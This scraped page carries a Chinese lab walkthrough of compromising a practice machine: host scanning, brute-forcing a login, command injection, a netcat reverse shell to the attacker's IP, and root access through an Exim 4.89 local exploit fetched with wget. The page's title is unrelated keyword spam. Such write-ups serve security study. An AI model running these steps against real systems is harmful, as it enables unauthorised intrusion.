当前位置: 首页 > news >正文

徐州绵业珠宝网站建设十大微商推广平台

徐州绵业珠宝网站建设,十大微商推广平台,wordpress博客 登录,注册网站账号违法吗信息搜集: 首先获取靶场ip,和之前一样。 arp-scan -l nmap -sP 192.168.28.0/24然后访问。 发现需要登录。 漏洞分析: 直接用bp爆破,爆破出来密码为happy,登录。 发现执行了命令,抓包。 修改命令可以执行&#xff…

信息搜集:

首先获取靶场ip,和之前一样。

arp-scan -l
nmap -sP 192.168.28.0/24

image-20230228170123671

然后访问。

发现需要登录。

漏洞分析:

image-20230228170152122

直接用bp爆破,爆破出来密码为happy,登录。

image-20230303155654501

发现执行了命令,抓包。

image-20230303155744771

修改命令可以执行,反弹一下shell试试。

反弹shell:

本地打开监听

nc -lvvp 9999

目标机主动连接

 nc <攻击机IP> <攻击机监听的端口> -e /bin/bash

image-20230303160123128

然后进入交互模式。

python -c "import pty;pty.spawn('/bin/bash')"

image-20230303160300869

然后用find命令找flag。

find / -name *flag*

没有找到,可能是权限不够,suid提权。

提权:

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

发现有/usr/sbin/exim4,看一下版本。

/usr/sbin/exim4 --version

image-20230303161520136

Exim version 4.89。

去搜一下paylaod。

searchsploit exim 4

image-20230303162031427

使用这个,本地起一个apache服务,然后将sh文件传入html页面。

systemctl start apache2.service
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /var/www/html

然后在目标机器上下载payload。

wget http://192.168.28.128/46996.sh

直接下载会发现没有权限,所以说随便进入一个 有权限的目录里下载。

下载后给可执行权限。

chmod +x 46996.sh
./46996.sh

image-20230303162820123

得到flag:

然后在root里得到flag。

image-20230303163824600

http://www.tj-hxxt.cn/news/7069.html

相关文章:

  • 如何做自己的网站怎样自己制作网站
  • 域名有了怎么做网站猪肉价格最新消息
  • wordpress外部调用后台一键优化表格
  • 网站建设中心口碑营销名词解释
  • 建一个外贸网站多少钱长春网站建设设计
  • 城乡建设证书查询官网深圳百度推广seo公司
  • 合肥网站建设哪家公司好百度网盘下载官网
  • 2017最新网站icp备案怎么在网上打广告
  • 手机h5免费模板网站网络推广与网络营销的区别
  • 做设计学什么英语比较好的网站正版google下载
  • 婚庆网站建设朝阳seo建站
  • 上海宝山网站建设培训班网站推广策划书模板
  • 一起做网站17宁波网站建设优化企业
  • 蛋糕网站案例如何提高百度搜索排名
  • 淘宝客做的好的几个网站长春网站提升排名
  • 哈尔滨网站建设那家好广告推广怎么做最有效
  • 做网站都去哪申请网址360渠道推广系统
  • 东莞微信网站建设推荐活动推广方式都有哪些
  • 一个专门做视频配音的网站网站如何做优化排名
  • 自定义网站建站公司搜索百度app下载
  • 比特币网站做任务百度推广怎么操作
  • 西安网站优化效果网络策划营销
  • 网站建设项目报告总结营销推广渠道
  • 贵阳58同城做网站2023北京封控了
  • 汉阳网站建设如何进行品牌营销
  • 阿里巴巴网站做推广效果怎么样最佳bt磁力狗
  • 太仓网站设计早晨设计如何推广一款app
  • 用tomcat做网站百度搜索风云榜游戏
  • 有哪些搜索引擎网站全网营销推广案例
  • 网站建设教程流程图电商营销推广方案